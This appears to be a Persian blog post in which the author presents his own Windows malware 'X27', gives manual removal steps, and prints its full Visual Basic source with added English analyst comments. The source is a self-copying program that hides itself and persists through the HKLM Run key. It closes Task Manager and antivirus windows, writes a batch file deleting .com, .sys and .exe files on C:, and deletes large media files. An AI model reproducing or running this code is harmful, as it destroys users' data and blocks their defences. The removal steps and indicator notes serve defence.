|
X27 را نمی توان شناخت و آن را نمی توان رده بندی کرد . یک ویروس ؟!یک کرم ؟؟ یا یک جاسوس !! استفاده از هفت موتور 1. تولید نام های با معنی 2. حذف فایل های Dat-Mpag 3. اجرای تصادفی Mp3-Wav-Gif-Bmp-Jpg 4. کپشن کلوزر 5. گزارش دهی تکثیر 6. کنترل از طریق شبکه 7. تکثیر در شبکه آمار تکثیر نشان از آن دارد که ( 235376 ) از X27 تکثیر شده . اما فقط 752 سیستم را آلوده کرده است که رقم کمی است . |
X27 با ناکامی روبرو شد . فقط به علت نقص در کامپایل
خودم هم نفهمیدم که ایکس بیست هفت یه ویروس بود ، یه کرم بود یا واقعا جاسوس بود .
نگارش جدید ایکس بیست و هفت در حال تکمیل شدنه به نام (Xs27) جالب که بدونید هیچ شباهتی به X27 نداره و سه تا موتور بیشتر نداره.
تکثیر از طریق فایل های html ,mp3,pdf
حذف پشتیبانی هارد توسط مادر بود .تبدیل کردن رم به حافظه دائمی
و موتور سوم که درباره اش توضیحی نمی دم .
مخصوص ویندوز Xp
حالا نحوه پاک کردن X27
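وارد فولدر system32 می شید و بعد دنبال فایل اجرایی x27 می گردید . اگه * رو یه نام نامعلوم در نظر بگیریم ، فایل اجرایی دارای نام *27.exe هست . این فایل رو cut کنید به دسکتاپ و رایانه رو ریست کنید . شما از دست X27 خلاص می شید. طبق سورس زیر ، X27 یه مقدار هم توی کلید رجیستری HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run می سازه و فایل های d3dir.dll ، ipmop32.dll و Wmvqmll.dll رو توی system32 می نویسه ؛ اگه کپی ثبت شده پیدا نشه ، کپی بعدی با نامی ساخته می شه که به 27.exe ختم نمی شه و اسمش توی d3dir.dll ثبت می شه . پس این موارد رو هم بررسی و پاک کنید .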
سورس X27
Option Explicit
' Module-level declarations of the X27 form. Analyst notes only; the code is unchanged.
' NOTE(review): ShutdownSystem, EWX_FORCEIFHUNG, SetKeyValue, HKEY_LOCAL_MACHINE and REG_SZ
' are used further down but are not declared in this listing; presumably they live in
' another module of the project.
' SendMessage is used below with WM_SYSCOMMAND / SC_MONITORPOWER to switch the monitor off and on.
Private Declare Function SendMessage Lib "user32" Alias _
"SendMessageA" (ByVal hwnd As Long, ByVal wMsg As _
Long, ByVal wParam As Long, lParam As Any) As Long
Const WM_SYSCOMMAND = &H112&
Const SC_MONITORPOWER = &HF170&
' SetWindowPos flags and z-order constants used by SetTopMostWindow.
Const SWP_NOMOVE = 2
Const SWP_NOSIZE = 1
Const FLAGS = SWP_NOMOVE Or SWP_NOSIZE
Const HWND_TOPMOST = -1
Const HWND_NOTOPMOST = -2
Private Declare Function SetWindowPos Lib "user32" _
(ByVal hwnd As Long, _
ByVal hWndInsertAfter As Long, _
ByVal x As Long, _
ByVal y As Long, _
ByVal cx As Long, _
ByVal cy As Long, _
ByVal wFlags As Long) As Long
' ak / akl: tick counter and random threshold used by T2_Timer.
Dim ak As Long
' s_lka: file name of the installed copy as recorded in d3dir.dll; tjjjs: one entry read from ipmop32.dll.
Dim s_lka, tjjjs As Variant
Dim akl As Long
' newnam1..3: names produced by Neword; sys_dir / Msys_dir: source and destination path of the first copy.
Dim newnam1, newnam2, newnam3, sys_dir, Msys_dir As Variant
Dim sh As New Shell
Dim fso As New FileSystemObject
Dim p2 As Variant
'---------------------------------------------------
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias _
"GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long _
) As Long
' dicop: "<Windows directory>\System32\" as built by syad; every state file is written below it.
Dim dicop As String
Dim div As Drive
' xum / xzp: tick counter and random threshold used by find_f_Timer.
Dim xum, xzp As Long
Dim fasa As File
Public Sins As String
Public SysDirectory As Long
'-------------------------------
Dim vas As Variant
Dim kkk_m, i As Long
'---------------------------------
' Window APIs used by CloseWIN to read the foreground window title and close that window.
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal LpString As String, ByVal cch As Long) As Long
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Private Declare Function DestroyWindow Lib "user32" (ByVal hwnd As Long) As Long
' p(): general scratch array. p(0) is the state code persisted in d3dir.dll (310, 420 or 530);
' p(21), p(22), p(23) are the counters persisted in Wmvqmll.dll.
Dim p(100) As Long
' panam: lower-cased title of the foreground window, refreshed by every CloseWIN call.
Dim panam As String
'-------------------------------
' Puts the window hwnd into or out of the topmost z-order band with SetWindowPos.
' Returns the SetWindowPos result when Topmost is True; in the other branch the result
' is overwritten with False before returning.
Private Function SetTopMostWindow(hwnd As Long, Topmost As Boolean) _
As Long
On Error Resume Next
If Topmost = True Then 'Make the window topmost
SetTopMostWindow = SetWindowPos(hwnd, HWND_TOPMOST, 0, 0, 0, 0, FLAGS)
Else
SetTopMostWindow = SetWindowPos(hwnd, HWND_NOTOPMOST, 0, 0, 0, 0, FLAGS)
SetTopMostWindow = False
End If
End Function
' Button handler: hides the form, shows the author's message box titled "X27", then shows the form again.
Private Sub Command1_Click()
On Error Resume Next
Me.Hide
MsgBox "Hi. My Name's X27 .I am very love Persia and War.if love my click ok else reset your system down.ment close is ok & R.sh is down system", vbCritical, "X27"
Me.Show
End Sub
' Button handler: calls ShutdownSystem with EWX_FORCEIFHUNG.
' NOTE(review): ShutdownSystem is not defined in this listing; the name suggests it shuts the machine down.
Private Sub Command2_Click()
On Error Resume Next
ShutdownSystem EWX_FORCEIFHUNG
End Sub
' Entry point of the form. Hides the process from the task list and the form from the screen,
' then resolves the System32 path (syad), generates names (Neword) and runs the install/state logic (on_load).
Private Sub Form_Load()
On Error Resume Next
' Stealth: no taskbar/task-list entry and no visible window.
App.TaskVisible = False
Me.Visible = False
syad
Neword
on_load
Label2 = newnam2
End Sub
' Install and state logic, driven by the state code stored in <System32>\d3dir.dll.
' Host artefacts visible in this routine (useful as indicators for detection and clean-up):
'   <System32>\d3dir.dll    - state code (310 / 420 / 530) and file name of the installed copy
'   <System32>\ipmop32.dll  - list of target paths for further copies
'   <System32>\Wmvqmll.dll  - three run counters
'   HKLM\Software\Microsoft\Windows\CurrentVersion\run - autostart value named after the copy
'   c:\nt27.txt, c:\X27.exe, d:\X27.bat
' Every error is suppressed by On Error Resume Next, so a failing step is silently skipped.
Private Sub on_load()
On Error Resume Next
sys_dir = App.Path + "\" + App.EXEName + ".exe"
Msys_dir = dicop + newnam1 + "27.exe"
' First run (no d3dir.dll yet): copy itself to System32 as <newnam1>27.exe, add an HKLM Run value,
' record state 310 and the file name in d3dir.dll, start the copy hidden and terminate.
If fso.FileExists(dicop + "d3dir.dll") = False Then
Call fso.CopyFile(sys_dir, Msys_dir)
SetKeyValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\run", newnam1 + "27.exe", dicop + newnam1 + "27.exe", REG_SZ
Open dicop + "d3dir.dll" For Output As #11
p(0) = 310
s_lka = newnam1 + "27.exe"
Write #11, p(0), s_lka
Close #11
Call Shell(dicop + newnam1 + "27.exe", vbHide)
End
Else
'--------------------------
Open dicop + "d3dir.dll" For Input As #155
Input #155, p(0), s_lka
Close #155
' Self-repair: the recorded copy is gone, so a new copy is written as <newnam2>.exe, registered
' under the same Run key, recorded in d3dir.dll and started. This copy does not end in "27.exe".
If fso.FileExists(dicop + s_lka) = False Then
p(67) = 1 + Int(Rnd * 3)
' As written this compares the literal 67 with 2, so the branch below never runs.
If (67) = 2 Then
newnam2 = ""
End If
Call fso.CopyFile(App.Path + "\" + App.EXEName + ".exe", dicop + newnam2 + ".exe")
SetKeyValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\run", newnam2 + ".exe", dicop + newnam2 + ".exe", REG_SZ
Open dicop + "d3dir.dll" For Output As #11
s_lka = newnam2 + ".exe"
Write #11, p(0), s_lka
Close #11
Call Shell(dicop + newnam2 + ".exe", vbHide)
End
'------------------------
Else
Open dicop + "d3dir.dll" For Input As #11
Input #11, p(0), s_lka
Close #11
' State 310: start the Tictak timer, which collects directories.
' NOTE(review): Tictak, Tco113 and find_f are assigned True/False here; they appear to be Timer
' controls on the form (see the *_Timer handlers), so this presumably toggles their Enabled property.
If p(0) = 310 Then Tictak = True
' State 420: ipmop32.dll should hold the target list. If it is missing or has fewer than
' 113 non-empty entries, go back to collecting; otherwise start the Tco113 timer.
If p(0) = 420 Then
If fso.FileExists(dicop + "\ipmop32.dll") = False Then
Tictak = True
Exit Sub
Else
Open dicop + "\ipmop32.dll" For Input As #1
p(57) = 0
While EOF(1) = False
Input #1, tjjjs
If tjjjs <> "" Then p(57) = p(57) + 1
Wend
Close #1
If p(57) < 113 Then
Tictak = True
Exit Sub
Else
Tco113 = True
End If
End If
End If
' State 530: payload phase, paced by the counters kept in Wmvqmll.dll.
If p(0) = 530 Then
If fso.FileExists(dicop + "\Wmvqmll.dll") = False Then
p(0) = 310
Open dicop + "d3dir.dll" For Input As #11
Input #11, p(0), s_lka
Close #11
on_load
Exit Sub
Else
Open dicop + "\Wmvqmll.dll" For Input As #21
Input #21, p(21), p(22), p(23)
Close #21
' p(21) is incremented on each pass through this branch and rolls over into p(22) at 7.
p(21) = p(21) + 1
If p(21) = 7 Then
p(22) = p(22) + 1
p(21) = 0
End If
' First rollover: minimise all windows, show the form and a message box, and switch the monitor off.
If p(22) = 1 And p(21) = 0 Then
sh.MinimizeAll
Neword
Me.Visible = True
MsgBox "Active Worm And Virus X27", vbCritical, "Hi"
T1.Enabled = True
SendMessage Me.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, ByVal 2&
End If
Open dicop + "\Wmvqmll.dll" For Output As #21
Write #21, p(21), p(22), p(23)
Close #21
'-------------------------------------------
' Kill switch: if c:\nt27.txt exists, the program deletes its recorded copy, its state files and
' the marker, then terminates. The Run value is not removed here. s_lka is a bare file name, so
' Kill resolves it against the current directory - TODO confirm which directory that is at run time.
If fso.FileExists("c:\nt27.txt") = True Then
Open dicop + "d3dir.dll" For Input As #155
Input #155, p(0), s_lka
Close #155
Kill (s_lka)
Kill (dicop + "d3dir.dll")
Kill (dicop + "\Wmvqmll.dll")
Kill ("c:\nt27.txt")
End
End If
' From the first rollover on, the find_f timer is started (opens media files, deletes large .dat/.mpg files).
If p(22) >= 1 Then
find_f = True
End If
' At p(22) = 7 and p(21) = 6 an extra copy is written to c:\X27.exe and started.
If p(22) = 7 And p(21) = 6 Then
Open "c:\nt27.txt" For Input As #155
p2 = "I love iran . my name is X27 "
Input #155, p2
Close #155
Call fso.CopyFile(App.Path + "\" + App.EXEName + ".exe", "c:\X27.exe")
Shell "c:\X27.exe"
End If
' From p(22) >= 2 the Run value for the running executable is rewritten on every pass.
If p(22) >= 2 Then
pv_reg
End If
' Destructive payload: appends a batch file to d:\X27.bat whose Del lines target .com, .sys and
' .exe files on C:, then opens it. Creation of d:\X27.bat is a clear indicator.
If p(21) > 6 Or p(22) > 7 Or p(23) > 0 Then
Open "d:\X27.bat" For Append As #1
Print #1, "@echo off"
Print #1, "Cls"
Print #1, "==========="
Print #1, "Color fc"
Print #1, "Del /a c:\*.com"
Print #1, "Del /a c:\*.sys"
Print #1, "Del /a c:\*.exe /s"
Print #1, "==========="
Close #1
sh.Open "d:\X27.bat"
End If
'-------------------------------------------
End If
End If
End If
End If
End Sub
' Picks random entries from a word list and stores them in Label2 and newnam1..newnam3.
' These names become the file names of the dropped copies.
' NOTE(review): the variable a is never assigned in this listing, so Split(a) has no words to
' return; the word list (1392 entries according to the comment below) appears to have been left out.
Public Sub Neword()
On Error Resume Next
Dim a As Variant
Dim mww As Variant
Dim lisa As Long
Dim laf As Variant
Dim las As Variant
' a is name
mww = Split(a)
'------------
'num word is (1392)
'------------
Randomize Timer
lisa = 1 + Int(Rnd * 1392)
' Label2: one random word with its first letter upper-cased.
Label2 = mww(lisa)
laf = UCase(Left(Label2, 1))
las = Right(Label2, Len(Label2) - 1)
Label2 = laf + las
p(87) = 1 + Int(Rnd * 1392)
p(88) = 1 + Int(Rnd * 1391)
' newnam1: one word; newnam2 and newnam3: two words joined by a space.
newnam1 = mww(p(87))
newnam2 = (mww(p(87))) + " " + (mww(p(88)))
newnam3 = mww(p(88)) + " " + mww(p(88) + 1)
End Sub
' Runs when the form is asked to close and answers by calling ShutdownSystem with EWX_FORCEIFHUNG.
' NOTE(review): ShutdownSystem is not defined in this listing.
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
On Error Resume Next
ShutdownSystem EWX_FORCEIFHUNG
End Sub
' Runs when the form unloads and starts a new hidden instance of the same executable.
Private Sub Form_Unload(Cancel As Integer)
On Error Resume Next
Shell App.Path + "\" + App.EXEName + ".exe", vbHide
End Sub
' Timer handler for the copy phase (state 420). Reads a target path from <System32>\ipmop32.dll
' and copies the running executable to it. When no entry is left, it records state 530 in d3dir.dll,
' writes three zero counters to Wmvqmll.dll, deletes ipmop32.dll and re-enters on_load.
' File #1 is not closed in the copy branch; errors from re-opening it are suppressed.
Private Sub Tco113_Timer()
On Error Resume Next
Open dicop + "\ipmop32.dll" For Input As #1
If EOF(1) = False Then
Input #1, tjjjs
Call fso.CopyFile(App.Path + "\" + App.EXEName + ".exe", tjjjs)
Else
Close #1
Open dicop + "d3dir.dll" For Input As #11
Input #11, p(0), s_lka
Close #11
' Switch to the payload phase.
p(0) = 530
Open dicop + "d3dir.dll" For Output As #11
Write #11, p(0), s_lka
Close #11
Open dicop + "\Wmvqmll.dll" For Output As #21
p(33) = 0
p(34) = 0
p(35) = 0
Write #21, p(33), p(34), p(35)
Close #21
Kill (dicop + "\ipmop32.dll")
on_load
Tco113 = False
End If
End Sub
' Timer handler: re-applies the topmost z-order to the form on every tick.
Private Sub Timer1_Timer()
On Error Resume Next
Dim lR As Long
lR = SetTopMostWindow(Me.hwnd, True)
End Sub
' Timer handler: disables itself and sends SC_MONITORPOWER with lParam -1, which powers the monitor back on.
Private Sub T1_Timer()
On Error Resume Next
T1.Enabled = False
SendMessage Me.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, ByVal -1&
End Sub
' Timer handler: nuisance payload. Counts ticks in ak; once ak exceeds a random threshold (1..400)
' it randomises both timer intervals, arms T1 and switches the monitor off (SC_MONITORPOWER, lParam 2).
' T1_Timer switches it back on.
Private Sub T2_Timer()
On Error Resume Next
Randomize Timer
akl = 1 + Int(Rnd * 400)
If ak > akl Then
T1.Interval = 1 + Int(Rnd * 900)
T2.Interval = 1 + Int(Rnd * 1000)
T1.Enabled = True
SendMessage Me.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, ByVal 2&
ak = 0
End If
ak = ak + 1
End Sub
' Persistence: writes a value named after the running executable, pointing at its full path,
' under HKLM\Software\Microsoft\Windows\CurrentVersion\run.
' NOTE(review): SetKeyValue is not defined in this listing.
Private Sub pv_reg()
On Error Resume Next
SetKeyValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\run", App.EXEName, App.Path + "\" + App.EXEName + ".exe", REG_SZ
End Sub
' Resolves the Windows directory with GetWindowsDirectory and stores "<Windows directory>\System32\"
' in dicop, the base path for the dropped copy and the state files.
Private Sub syad()
On Error Resume Next
Sins = Space(255)
Dim WinDirectory As Variant
' The return value is the length of the path written into the buffer.
WinDirectory = GetWindowsDirectory(Sins, 255)
Sins = Left$(Sins, WinDirectory)
dicop = Sins + "\System32\"
End Sub
' Timer handler for the collection phase (state 310). While Combo1 holds fewer than 113 entries,
' each tick picks a random drive and walks a random number (1..14) of random directory steps, then
' adds the resulting path if the drive is a fixed drive other than the one the program runs from.
' Once the list is full, it writes every path plus a generated "<name>.exe" to <System32>\ipmop32.dll,
' records state 420 in d3dir.dll and re-enters on_load.
' NOTE(review): dri_n, Dir1 and Combo1 look like drive-list, directory-list and combo-box controls
' on the form; the form definition is not part of this listing.
Private Sub Tictak_Timer()
On Error Resume Next
Randomize Timer
If 113 > Combo1.ListCount Then
dri_n.ListIndex = 1 + Int(Rnd * dri_n.ListCount)
fso.GetDrive Left$(dri_n, 2)
Dir1.Path = dri_n
kkk_m = 1 + Int(Rnd * 14)
If Dir1.ListCount > 0 Then
For i = 1 To kkk_m
Dir1.ListIndex = 1 + Int(Rnd * Dir1.ListCount)
Dir1 = Dir1.List(1 + Int(Rnd * Dir1.ListCount))
Next i
End If
' Drop an existing entry for the same path before it is possibly added again.
For i = 0 To Combo1.ListCount
If Combo1.List(i) = Dir1.Path Then Combo1.RemoveItem (i)
Next i
Set div = fso.GetDrive(Left$(dri_n, 2))
If UCase(Left$(App.Path, 1)) <> UCase(Left$(dri_n, 1)) And div.DriveType = Fixed Then Combo1.AddItem Dir1.Path
Else
Open dicop + "\ipmop32.dll" For Output As #13
For i = 1 To Combo1.ListCount
Combo1.ListIndex = i - 1
Neword
Combo1.Text = Combo1.Text + "\" + Label2 + ".exe"
Write #13, Combo1.Text
Next i
Close #13
Open dicop + "d3dir.dll" For Input As #11
Input #11, p(0), s_lka
Close #11
' Switch to the copy phase.
p(0) = 420
Open dicop + "d3dir.dll" For Output As #11
Write #11, p(0), s_lka
Close #11
on_load
Tictak = False
End If
End Sub
' Timer handler for the payload phase. Each tick moves to a random directory and then:
'  1. once the tick counter xum exceeds a random threshold (113..1732), minimises all windows and
'     opens one random image, audio or HTML file from that directory;
'  2. picks one random *.dat / *.mpg file there and deletes it if it is larger than 1001367 bytes.
' Step 2 causes data loss; unexplained deletion of large .dat/.mpg files is a symptom to look for.
Private Sub find_f_Timer()
On Error Resume Next
Randomize Timer
dri_n.ListIndex = 1 + Int(Rnd * dri_n.ListCount)
fso.GetDrive Left(dri_n, 2)
Dir1.Path = dri_n
kkk_m = 1 + Int(Rnd * 14)
If Dir1.ListCount > 0 Then
For i = 1 To kkk_m
Dir1.ListIndex = 1 + Int(Rnd * Dir1.ListCount)
Dir1 = Dir1.List(1 + Int(Rnd * Dir1.ListCount))
Next i
End If
'------------------------
File1.Pattern = "*.bmp;*.jpG;*.gif;*.wav;*.mp3;*.wma;*.html;*.htm"
xum = xum + 1
xzp = 113 + Int(Rnd * 1620)
If File1.ListCount > 0 And xum > xzp Then
File1.ListIndex = Int(Rnd * File1.ListCount)
sh.MinimizeAll
sh.Open (File1.Path + "\" & File1)
xum = 0
'----------------------------------------
End If
File1.Pattern = "*.dat;*.mpg"
If File1.ListCount > 0 Then
File1.ListIndex = Int(Rnd * File1.ListCount)
Set fasa = fso.GetFile(File1.Path + "\" & File1)
If fasa.Size > 1001367 Then
Kill (File1.Path + "\" & File1)
End If
End If
End Sub
' Control event: assigns Dir1 to File1 whenever the selected directory changes.
' NOTE(review): presumably this keeps the file list on the same directory - confirm against the form definition.
Private Sub Dir1_Change()
File1 = Dir1
End Sub
' Control event: points Dir1 at the drive selected in dri_n.
Private Sub dri_n_Change()
Dir1.Path = dri_n
End Sub
' Reads the title of the foreground window into panam (lower-cased) and, if it equals Caption
' ignoring case, tries to close that window: DestroyWindow first, then Alt+F4 via SendKeys if the
' same window is still in the foreground.
' Side effect: panam is refreshed on every call, also when nothing is closed; clow_tik_Timer relies on that.
Private Sub CloseWIN(Caption As String)
Dim h As Long
Dim h2 As Long
Dim wn As String
wn = Space(255)
h = GetForegroundWindow()
GetWindowText h, wn, GetWindowTextLength(h) + 1
panam = LCase(CStr(wn))
If panam = LCase(Caption) Then
h2 = h
DestroyWindow h
DoEvents
If h2 = GetForegroundWindow() Then SendKeys "%{f4}"
End If
End Sub
' Timer handler: the "caption closer". On each tick it reads the foreground window title and asks
' CloseWIN to close the window when the title contains "task manager", "virus", "worm", "notepad",
' "new" or "reg". This interferes with Task Manager, registry tools and security software, so
' windows that close by themselves are a symptom of this program.
' It also counts consecutive ticks on which the title contains "internet" and, after more than 50,
' minimises all windows and opens the URL below.
Private Sub clow_tik_Timer()
On Error Resume Next
' The "h.no" call serves to refresh panam with the current foreground title.
CloseWIN ("h.no")
If InStr(1, LCase(panam), "task manager") <> 0 Then CloseWIN (panam)
If p(1) = 1 And panam <> "" Then CloseWIN (panam)
If p2 = "close" Then CloseWIN ("Windows Task Manager")
If p(3) = 1 Then CloseWIN ("Control Panel")
'--------------------
If InStr(1, LCase(panam), "virus") <> 0 Then CloseWIN (panam)
'--------------------
If InStr(1, LCase(panam), "worm") <> 0 Then CloseWIN (panam)
'---------------------
If InStr(1, LCase(panam), "notepad") <> 0 Then CloseWIN (panam)
'--------------------
If InStr(1, LCase(panam), "new") <> 0 Then CloseWIN (panam)
'---------------------
If InStr(1, LCase(panam), "reg") <> 0 Then CloseWIN (panam)
If InStr(1, LCase(panam), "internet") <> 0 Then
p(11) = p(11) + 1
If p(11) > 50 Then
sh.MinimizeAll
sh.Open "http:\\www.arnh.blogfa.com"
End If
Else
p(11) = 0
End If
'----------------------------------------
End Sub
ایکس بیست هفت سوخت . چرا که محدود بود .
اما xs27 ترکیبی از اسمبلی و بیست هفت هست . منتظرش باشید .
برادر کوچک شما علیرضا .::.